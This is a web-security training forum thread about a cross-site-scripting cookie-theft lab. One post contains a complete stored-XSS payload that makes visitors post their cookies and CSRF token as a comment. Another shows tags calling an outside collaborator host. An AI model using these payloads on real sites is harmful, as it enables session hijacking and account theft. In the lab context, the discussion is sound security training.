lab question

5ch00l Nov 05, 2019 01:44PM UTC

How am I supposed to steal cookies from this lab
"Lab: Exploiting cross-site scripting to steal cookies" without having Burp Professional and without using the Burp Collaborator client?
I've tried redirecting users to my site and making everyone that visits the blog post a comment,
but neither of these two seems to work.


5ch00l Nov 05, 2019 02:50PM UTC
<!-- hidden comment form, filled in and submitted by the script below -->
<form id="my_form" action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">
<input required type="hidden" name="postId" value="4">
<input type="hidden" id="coke" value="" name="comment">
<input required type="hidden" value="majname" name="name">
<input required type="hidden" value="majmail@gmail.com" name="email">
</form>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script>
$(window).on('load', function(){
// read the page's own CSRF token so the POST is accepted
var a_csrf = document.getElementsByName('csrf')[0].value;
// put the viewer's cookies into the comment field
document.getElementById('coke').value = document.cookie;
// add the token to the hidden form and submit it
var inp = document.createElement('input');
inp.type = "hidden";
inp.name = "csrf";
inp.value = a_csrf;
document.getElementById('my_form').appendChild(inp);
document.getElementById('my_form').submit();
});
</script>


This is my payload for commenting.
It works on me, but no bot seems to visit the blog though.

Liam Tai-Hogan Nov 05, 2019 04:09PM UTC Support Center agent

Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed.


5ch00l Nov 05, 2019 07:11PM UTC
Please read what I have written and don't reply with a copy-paste. Or is this an automated bot?

Mike Eaton Nov 06, 2019 11:41AM UTC Support Center agent

Hi, the previous comment is valid and was not written by a bot. If you were able to perform that action, you would force the emulated admin user to submit their cookie as a comment, which you could then retrieve from the blog post and submit in your request to solve the lab.

I have just checked the lab and it is working as intended, as I have been able to solve it. There is a lab which allows you to practice exploiting XSS to perform CSRF at the following link, which you could use to help you: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf


t Nov 08, 2019 08:22PM UTC
Hello. I had exactly the same issue and it really looks unsolvable. Could there be anything else wrong? Like different lab instances? My PoC works inside my browser, but otherwise no bot makes any request; I tried this for every postId several times.

I have even tried to inject very simple HTML tags, like those below, but the only HTTP connection I ever received was mine:

<img src="https://MYDOMAIN.burpcollaborator.net"></img>
<script src="https://MYDOMAIN.burpcollaborator.net/?aa"></script>

Is there any other test you suggest I could perform to validate that the bot is visiting my post? Because clearly, it looks like he is not.

t Nov 10, 2019 07:39AM UTC
Doing it a little differently than the explained solution, I can confirm that the lab is still solvable.

Liam Tai-Hogan Nov 11, 2019 08:47AM UTC Support Center agent

Thanks for this report t. I’ve passed on your message to our Web Academy team.


t Nov 12, 2019 06:46AM UTC
Thanks. I noticed another weird thing when I was doing https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration . Again, the same situation: there was a DNS query to Burp Collaborator, but no HTTP request. Then I changed the URL to the "exploit server" (so instead of Collaborator; I verified the access logs and the HTTP request was really made), as someone suggested here: https://support.portswigger.net/customer/portal/questions/17576275-web-security-academy-blind-xxe-lab-3-exploiting-blind-xxe-to-exfiltrate-data-using-a-malicious-

I also saw this video that I googled, https://www.youtube.com/watch?v=glA5FwCdspk , about the solution, and I did everything exactly the same way, but as mentioned, I have not received the request.

To summarise, it looks like the issue is that the HTTP request is not made to my Collaborator, even though my Collaborator is working correctly, as I validated via curl: it shows every HTTP request, but none from this lab. There is no possibility that I made any typo, as I verified everything several times.

Liam Tai-Hogan Nov 12, 2019 01:05PM UTC Support Center agent

Thanks for following up. We’re currently investigating this issue.


Liam Tai-Hogan Nov 12, 2019 03:04PM UTC Support Center agent

This issue should now be resolved.

Please let us know if you need any further assistance.
